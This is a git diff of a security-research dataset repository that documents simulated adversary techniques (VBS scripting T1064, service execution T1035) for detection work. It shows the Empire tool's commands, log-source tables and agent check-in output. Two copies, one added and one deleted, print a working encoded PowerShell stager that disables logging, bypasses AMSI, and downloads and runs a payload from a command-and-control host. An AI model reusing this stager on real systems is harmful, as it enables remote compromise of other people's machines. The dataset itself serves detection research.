stager/windows/launcher_vbs) > execute + +[*] Stager output written out to: /tmp/autoupdate.vbs + +(Empire: stager/windows/launcher_vbs) > +``` + +File is created and contains: + +``` +Dim objShell +Set objShell = WScript.CreateObject("WScript.Shell") +command = "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAcwBJAE8AbgBUAEEAYgBMAGUALgBQAFMAVgBlAHIAcwBJAG8AbgAuAE0AYQBKAE8AcgAgAC0ARwBlACAAMwApAHsAJAA4AEQAQQBjADEAPQBbAFIARQBmAF0ALgBBAFMAcwBFAE0AQgBMAHkALgBHAGUAVABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBJAEUAYABsAEQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkARgAoACQAOABEAEEAQwAxACkAewAkADMAMgBlADQARgA9ACQAOABkAEEAQwAxAC4ARwBlAHQAVgBBAGwAdQBlACgAJABuAHUATABMACkAOwBJAEYAKAAkADMAMgBFADQARgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADMAMgBlADQARgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAAzADIARQA0AGYAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJAB2AGEAbAA9AFsAQwBvAGwATABlAGMAVABJAG8AbgBTAC4ARwBFAG4ARQBSAGkAQwAuAEQASQBjAFQAaQBPAG4AQQByAHkAWwBTAHQAcgBpAG4ARwAsAFMAeQBTAHQAZQBNAC4ATwBiAEoAZQBjAFQAXQBdADoAOgBuAGUAVwAoACkAOwAkAHYAYQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAQQBMAC4AQQBEAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAMwAyAEUANABmAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBsAH0ARQBMAFMARQB7AFsAUwBDAHIAaQBwAFQAQgBMAE8AYwBrAF0ALgAiAEcAZQBUAEYAaQBFAGAAbABkACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAEEATABVAGUAKAAkAG4AVQBMAEwALAAoAE4AZQB3AC0ATwBiAGoARQBDAFQAIABDAE8AbABMAEUAQwBUAEkAbwBOAHMALgBHAEUAbgBlAFIASQBDAC4ASABBAFMASABTAGUAdABbAHMAdAByAEkAbgBnAF0AKQApAH0AJABSAEUARgA9AFsAUgBlAGYAXQAuAEEAcwBTAGUATQBCAEwAeQAuAEcAZQBUAFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBGAC4ARwBlAHQARgBpAEUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEAbABVAEUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AEUAKQA7AH0AOwBbAFMAeQBTAFQARQBNAC4ATgBlAHQALgBTAEUAcgBWAGkAQwBFAFAATwBJAG4AdABNAGEATgBBAEcARQBSAF0AOgA6AEUAeABQAEUAQwBUADEAMAAwAEMATwBuAFQAaQBuAFUARQA9ADAAOwAkADQAMwBFAGYAMwA9AE4ARQB3AC0ATwBiAEoARQBjAFQAIABTAHkAcwB0AEUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAEkAZQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQANAAzAGUAZgAzAC4ASABFAGEAZABlAFIAcwAuAEEAZABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQANAAzAGUARgAzAC4ASABlAGEAZABlAHIAcwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQANAAzAGUAZgAzAC4AUAByAG8AeAB5AD0AWwBTAFkAUwB0AGUATQAuAE4AZQB0AC4AVwBFAEIAUgBlAHEAdQBlAHMAVABdADoAOgBEAEUARgBhAFUAbAB0AFcAZQBCAFAAUgBPAFgAeQA7ACQANAAzAGUAZgAzAC4AUABSAG8AeAB5AC4AQwBSAGUAZABFAG4AVABpAGEAbABTACAAPQAgAFsAUwBZAHMAVABlAG0ALgBOAGUAdAAuAEMAcgBlAGQARQBuAHQASQBBAEwAQwBhAGMAaABlAF0AOgA6AEQARQBGAEEAdQBMAHQATgBlAFQAdwBPAFIASwBDAHIARQBEAGUAbgB0AGkAYQBMAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQANAAzAGUAZgAzAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwBUAGUAbQAuAFQAZQB4AFQALgBFAG4AYwBvAGQAaQBOAEcAXQA6ADoAQQBTAEMASQBJAC4ARwBFAFQAQgBZAHQARQBTACgAJwB+AGsAKgBfAEYAUwBqAHIAOAAlAHgAdwBlAEoANgBoAHwAUABLAC4AZgB7AFUATgBNAEgAdQBkAHAANQB5AG0AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBHAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AE8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABzAGUAcgA9ACQAKABbAFQAZQBYAHQALgBFAE4AQwBvAEQASQBOAEcAXQA6ADoAVQBOAGkAYwBPAEQAZQAuAEcARQB0AFMAdAByAGkATgBHACgAWwBDAE8ATgB2AGUAcgBUAF0AOgA6AEYAUgBvAG0AQgBBAHMARQA2ADQAUwB0AFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBAHUAQQBEAEEAQQBMAGcAQQB4AEEARABBAEEATABnAEEAeABBAEQAQQBBAE4AZwBBAD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQANAAzAEUAZgAzAC4ASABlAEEAZABFAHIAUwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBIAFkAdgBsAFAASgBNAG0AcwBrAHkATgBGAFQAawA9AHoAbwBqADAAdgBDAE0ATwBsAFYAZQByADIARgBJAFMAZgBpAEYAawBSAEMAagBsAHIAOABjAD0AIgApADsAJABEAGEAVABhAD0AJAA0ADMARQBmADMALgBEAE8AdwBuAGwAbwBBAEQARABBAFQAYQAoACQAUwBlAHIAKwAkAFQAKQA7ACQAaQB2AD0AJABEAGEAVABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABBAFsANAAuAC4AJABkAEEAdABBAC4AbABlAE4ARwB0AEgAXQA7AC0AagBvAGkAbgBbAEMASABhAHIAWwBdAF0AKAAmACAAJABSACAAJABEAEEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=" +objShell.Run command,0 +Set objShell = Nothing +``` + +User downloads and clicks on vbs file: + +![alt text](../../../../../docs/source/_static/empire_launcher_vbs.png "vbs script") + +New agent checks in.. + +``` +(Empire) > +(Empire) > [*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent H3DKB8SA checked in +[+] Initial agent H3DKB8SA from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to H3DKB8SA at 10.0.10.103 + +(Empire) > +(Empire) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 18:21:29 https + +(Empire: agents) > +``` \ No newline at end of file diff --git a/small_datasets/windows/execution/scripting_T1064/empire_launcher_vbs.tar.gz b/small_datasets/windows/execution/scripting_T1064/empire_launcher_vbs.tar.gz new file mode 100644 index 00000000..acd46572 Binary files /dev/null and b/small_datasets/windows/execution/scripting_T1064/empire_launcher_vbs.tar.gz differ diff --git a/small_datasets/windows/execution/scripting_T1064/vbs/README.md b/small_datasets/windows/execution/scripting_T1064/vbs/README.md deleted file mode 100644 index 55b4b61f..00000000 --- a/small_datasets/windows/execution/scripting_T1064/vbs/README.md +++ /dev/null @@ -1,9 +0,0 @@ -# VBS Scripts - -An adversary can use VBS scripts to execute commands on an endpoint - -## Technique Variations Table - -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_launcher_vbs](./empire_launcher_vbs.md) | 2019-03-11223154 | \ No newline at end of file diff --git a/small_datasets/windows/execution/scripting_T1064/vbs/empire_launcher_vbs.md b/small_datasets/windows/execution/scripting_T1064/vbs/empire_launcher_vbs.md deleted file mode 100644 index 684fbae7..00000000 --- a/small_datasets/windows/execution/scripting_T1064/vbs/empire_launcher_vbs.md +++ /dev/null @@ -1,148 +0,0 @@ - -# Empire VBS Launcher - -An adversary can use a VBS script as a launcher for initial access techniques. - -## Technique(s) ID - -T1064 - -## Creators - -Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) - -## Dataset - -[empire_launcher_vbs.tar.gz](./empire_launcher_vbs.tar.gz) - -## Network Environment - -Shire - -## Time Taken - -2019-03-11223154 - -## About this file - -| log_name | source_name | task | record_number | -|------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| -| Windows PowerShell | PowerShell | Pipeline Execution Details | 39 | -| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | -| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | -| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 383 | -| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 140 | -| Security | Microsoft-Windows-Security-Auditing | User Account Management | 127 | -| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 33 | -| Security | Microsoft-Windows-Security-Auditing | Process Creation | 19 | -| Security | Microsoft-Windows-Security-Auditing | Process Termination | 11 | -| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 8 | -| Security | Microsoft-Windows-Security-Auditing | MPSSVC Rule-Level Policy Change | 8 | -| Security | Microsoft-Windows-Security-Auditing | Special Logon | 5 | -| Security | Microsoft-Windows-Security-Auditing | Group Membership | 4 | -| Security | Microsoft-Windows-Security-Auditing | Logon | 4 | -| Security | Microsoft-Windows-Security-Auditing | Logoff | 2 | -| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 2 | -| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | -| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1576 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 1282 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 780 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 353 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 114 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 60 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 51 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 49 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 17 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 42 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | -| Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 1130 | - -## Empire Activity - -``` -usestager windows/launcher_vbs -set Listener https -execute -``` - -``` -(Empire: listeners) > usestager windows/launcher_vbs -(Empire: stager/windows/launcher_vbs) > info - -Name: VBS Launcher - -Description: - Generates a .vbs launcher for Empire. - -Options: - - Name Required Value Description - ---- -------- ------- ----------- - Listener True Listener to generate stager for. - OutFile False /tmp/launcher.vbs File to output .vbs launcher to, - otherwise displayed on the screen. - Obfuscate False False Switch. Obfuscate the launcher - powershell code, uses the - ObfuscateCommand for obfuscation types. - For powershell only. - ObfuscateCommand False Token\All\1,Launcher\PS\12467The Invoke-Obfuscation command to use. - Only used if Obfuscate switch is True. - For powershell only. - Language True powershell Language of the stager to generate. - ProxyCreds False default Proxy credentials - ([domain\]username:password) to use for - request (default, none, or other). - UserAgent False default User-agent string to use for the staging - request (default, none, or other). - Proxy False default Proxy to use for request (default, none, - or other). - StagerRetries False 0 Times for the stager to retry - connecting. - - -(Empire: stager/windows/launcher_vbs) > set Listener https -(Empire: stager/windows/launcher_vbs) > execute - -[*] Stager output written out to: /tmp/launcher.vbs - -(Empire: stager/windows/launcher_vbs) > -``` - -File is created and contains: - -``` -Dim objShell -Set objShell = WScript.CreateObject("WScript.Shell") -command = "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAHIAcwBJAG8ATgBUAEEAQgBMAGUALgBQAFMAVgBFAFIAUwBpAE8AbgAuAE0AYQBKAE8AUgAgAC0ARwBlACAAMwApAHsAJABkADMAOQA4ADIAPQBbAFIAZQBGAF0ALgBBAFMAcwBlAE0AYgBMAFkALgBHAGUAVABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAHQARgBpAEUAYABsAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkARgAoACQARAAzADkAOAAyACkAewAkADkAZQA1AGEAYgA9ACQAZAAzADkAOAAyAC4ARwBFAHQAVgBhAEwAVQBlACgAJABuAHUAbABsACkAOwBJAGYAKAAkADkAZQA1AEEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADkAZQA1AGEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5AEUANQBhAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJAB2AGEATAA9AFsAQwBvAEwAbABFAGMAdABJAE8AbgBTAC4ARwBFAG4ARQByAEkAYwAuAEQAaQBDAHQASQBvAE4AQQBSAFkAWwBzAHQAcgBJAG4AZwAsAFMAeQBTAHQAZQBtAC4ATwBCAGoARQBjAFQAXQBdADoAOgBOAGUAVwAoACkAOwAkAHYAYQBMAC4AQQBEAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAHYAQQBMAC4AQQBEAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOQBlADUAQQBCAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAYQBsAH0ARQBsAHMARQB7AFsAUwBDAFIAaQBQAFQAQgBMAE8AYwBLAF0ALgAiAEcAZQB0AEYASQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEAbAB1AEUAKAAkAE4AVQBMAGwALAAoAE4ARQB3AC0ATwBiAEoARQBDAHQAIABDAG8AbABsAEUAYwBUAEkAbwBuAFMALgBHAGUATgBFAFIAaQBjAC4ASABBAFMASABTAGUAdABbAHMAVAByAGkATgBHAF0AKQApAH0AJABSAGUARgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUATQBCAGwAWQAuAEcAZQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBFAHQARgBpAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEATAB1AGUAKAAkAE4AVQBMAGwALAAkAHQAUgB1AEUAKQA7AH0AOwBbAFMAWQBzAFQARQBtAC4ATgBlAHQALgBTAEUAcgBWAEkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAEcAZQByAF0AOgA6AEUAeABwAEUAYwB0ADEAMAAwAEMATwBuAFQASQBOAHUAZQA9ADAAOwAkADMAOAA3AEEAMQA9AE4ARQBXAC0ATwBiAEoARQBDAHQAIABTAHkAcwB0AEUAbQAuAE4ARQBUAC4AVwBFAEIAQwBMAGkARQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQAMwA4ADcAYQAxAC4ASABFAEEAZABlAFIAUwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAMwA4ADcAQQAxAC4ASABlAGEAZABlAHIAcwAuAEEAZABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAMwA4ADcAQQAxAC4AUABSAG8AeAB5AD0AWwBTAFkAcwB0AEUATQAuAE4ARQB0AC4AVwBFAGIAUgBlAHEAVQBlAFMAVABdADoAOgBEAEUARgBhAFUATAB0AFcARQBiAFAAUgBPAFgAeQA7ACQAMwA4ADcAQQAxAC4AUABSAE8AWABZAC4AQwBSAEUAZABlAE4AdABJAEEATABzACAAPQAgAFsAUwB5AHMAVABlAE0ALgBOAEUAdAAuAEMAUgBlAGQAZQBOAHQAaQBBAGwAQwBBAGMAaABlAF0AOgA6AEQARQBGAGEAVQBsAHQATgBlAHQAdwBvAHIASwBDAFIAZQBkAGUAbgB0AGkAYQBsAFMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAMwA4ADcAYQAxAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUATQAuAFQAZQBYAHQALgBFAE4AQwBvAGQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgBZAFQARQBzACgAJwBkAEoAaQBxAEEANQBvAEYAewBwAFUANwBMAG4AawA6AC4ALwBJAFEAVwBUADEAcgBEAHYAKABnAEIANABSAH0AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBHAFMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBOAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AE8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAG4AYwBPAEQAaQBOAGcAXQA6ADoAVQBOAEkAYwBvAGQARQAuAEcARQBUAFMAVABSAEkAbgBnACgAWwBDAE8ATgBWAEUAUgBUAF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwBUAHIAaQBuAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBAHUAQQBEAEEAQQBMAGcAQQB4AEEARABBAEEATABnAEEAeABBAEQAQQBBAE4AZwBBADYAQQBEAFEAQQBOAEEAQQB6AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAMwA4ADcAQQAxAC4ASABlAEEARABFAHIAcwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBFAFcAcQBYAGQAcgBBAHEAbgBQAFIAawBNAEoAdQBGAD0AaAB4AGoARgBKAGoAbwBBAFAAegBiAEUASQB4ACsANABQADgAZgBCAGsAOQBHAEYASAAyAE0APQAiACkAOwAkAGQAQQBUAEEAPQAkADMAOAA3AGEAMQAuAEQAbwB3AG4AbABvAGEAZABEAEEAdABhACgAJABzAEUAUgArACQAVAApADsAJABJAFYAPQAkAGQAYQB0AEEAWwAwAC4ALgAzAF0AOwAkAEQAQQB0AEEAPQAkAGQAQQBUAEEAWwA0AC4ALgAkAEQAQQB0AEEALgBsAGUATgBHAFQAaABdADsALQBqAG8ASQBOAFsAQwBIAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==" -objShell.Run command,0 -Set objShell = Nothing -``` - -User downloads and clicks on vbs file: - -![alt text](../../../../../resources/images/empire_launcher_vbs.png "vbs script") - -New agent checks in.. - -``` -(Empire: stager/windows/launcher_vbs) > [*] Sending POWERSHELL stager (stage 1) to 10.0.10.104 -[*] New agent 7NTMF3VR checked in -[+] Initial agent 7NTMF3VR from 10.0.10.104 now active (Slack) -[*] Sending agent (stage 2) to 7NTMF3VR at 10.0.10.104 - -(Empire: stager/windows/launcher_vbs) > -(Empire: stager/windows/launcher_vbs) > agents - -[*] Active agents: - - Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener - ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- - 7NTMF3VR ps 172.18.39.105 IT001 SHIRE\pgustavo powershell 6536 5/0.0 2019-03-11 22:31:54 https - -(Empire: agents) > -``` \ No newline at end of file diff --git a/small_datasets/windows/execution/scripting_T1064/vbs/empire_launcher_vbs.tar.gz b/small_datasets/windows/execution/scripting_T1064/vbs/empire_launcher_vbs.tar.gz deleted file mode 100644 index f52063c5..00000000 Binary files a/small_datasets/windows/execution/scripting_T1064/vbs/empire_launcher_vbs.tar.gz and /dev/null differ diff --git a/small_datasets/windows/execution/service_execution_T1035/README.md b/small_datasets/windows/execution/service_execution_T1035/README.md new file mode 100644 index 00000000..3fa8728a --- /dev/null +++ b/small_datasets/windows/execution/service_execution_T1035/README.md @@ -0,0 +1,9 @@ +# Service Execution + +Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_psexec](./empire_invoke_psexec.md) | 2019-05-18210652 | \ No newline at end of file diff --git a/small_datasets/windows/execution/service_execution_T1035/empire_invoke_psexec.md b/small_datasets/windows/execution/service_execution_T1035/empire_invoke_psexec.md new file mode 100644 index 00000000..c8f5ba63 --- /dev/null +++ b/small_datasets/windows/execution/service_execution_T1035/empire_invoke_psexec.md @@ -0,0 +1,144 @@ +# Empire Invoke Psexec + +Executes a stager on remote hosts using PsExec type functionality. + +## Technique(s) ID + +T1035 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_psexec.tar.gz](./empire_invoke_psexec.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18210652 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | 